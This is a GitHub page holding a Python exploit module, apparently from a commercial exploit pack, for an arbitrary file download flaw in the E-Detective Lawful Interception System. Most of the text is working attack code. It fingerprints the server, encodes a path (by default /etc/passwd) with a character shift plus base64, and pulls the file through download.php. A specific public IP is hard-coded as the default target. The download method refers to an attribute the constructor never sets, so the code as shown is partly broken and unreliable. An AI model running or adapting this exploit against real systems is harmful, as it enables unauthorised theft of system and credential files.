Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
127 lines (113 sloc) 3.82 KB
#!/usr/bin/env python
# The exploit is a part of Agora pack - use only under the license agreement
# specified in LICENSE.txt in your Agora distribution
import sys
import re
import os
import urllib2
import base64
sys.path.append("./core")
from Sploit import Sploit
INFO={}
INFO['NAME']="se_e-detective_afd"
INFO['DESCRIPTION']="E-Detective Lawful Interception System Arbitrary File Download"
INFO['VENDOR']="http://www.edecision4u.com/"
INFO["CVE Name"]="N/A"
INFO["NOTES"]="""
Arbitrary File Download Exploit
Tested on Online Demo Site.
"""
INFO['CHANGELOG']="14 July, 2015. Written by Gleg team."
INFO['PATH'] = "Exploits/"
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "60.251.127.211"
OPTIONS["PORT"] = "13443"
OPTIONS["FILENAME"] = "/etc/passwd"
OPTIONS["SSL"] = True
class exploit(Sploit):
def __init__(self,host="",
port=0, fileDownload="", ssl=True,
logger=None):
Sploit.__init__(self,logger=logger)
self.port = port
self.host = host
self.filed = fileDownload
self.ssl = ssl
self.url = ""
self.name = INFO['NAME']
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.filed = self.args.get('FILENAME', self.filed)
self.ssl = self.args.get('SSL', self.ssl)
if self.ssl:
self.url = "https://"+self.host+":"+str(self.port)
else:
self.url = "http://"+self.host+":"+str(self.port)
return
def check(self):
self.args()
"""
Quicky banner check
"""
#self.setInfo( "%s attacking %s:%d - Running" % ( NAME, self.host, self.port ) )
self.log( "Testing %s:%d" % ( self.host, self.port ) )
try:
fd = urllib2.urlopen(self.url)
except urllib2.URLError, er:
if hasattr(er,'reason'):
self.log(er.reason)
elif hasattr(er,'code'):
self.log("Error code: %s"%er.code)
return 0
if "log_info.php" in fd.read():
self.log("Found e-detective server")
return 1
else:
return 0
def encode(self, text):
encoded = ''
for i in range(len(text)):
encoded += chr(ord(text[i]) + 40)
encoded = base64.b64encode(encoded)
return encoded
def download(self):
self.log('attacking (in progress)')
self.log('Try to download file: {}'.format(self.file))
urlDownload = self.encode(self.file)
fd = urllib2.urlopen(self.url+"/common/download.php?file="+urlDownload)
self.log('===Content of file===')
self.log(fd.read())
self.log('=========End=========')
self.log('Attacking (succeeded)')
self.state = "success"
return 1
def run(self):
if not self.check():
self.log( "Testing didn't find vulnerable target" )
#self.setInfo( "%s attacking %s:%d - (Failed!)" % ( NAME, self.host, self.port ), showlog = 1 )
self.finish(False)
return 0
if not self.download():
self.log( "Failed" )
#self.setInfo( "%s attacking %s:%d - (Failed!)" % ( NAME, self.host, self.port ), showlog = 1 )
self.finish(False)
return 0
self.log( "Done." )
#self.setInfo( "%s attacking %s:%d - (Success!)" % ( NAME, self.host, self.port ) )
self.finish(True)
return 1
if __name__ == '__main__':
"""
By now we only have the tool
mode for exploit..
Later we would have
standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1",80)
e.run()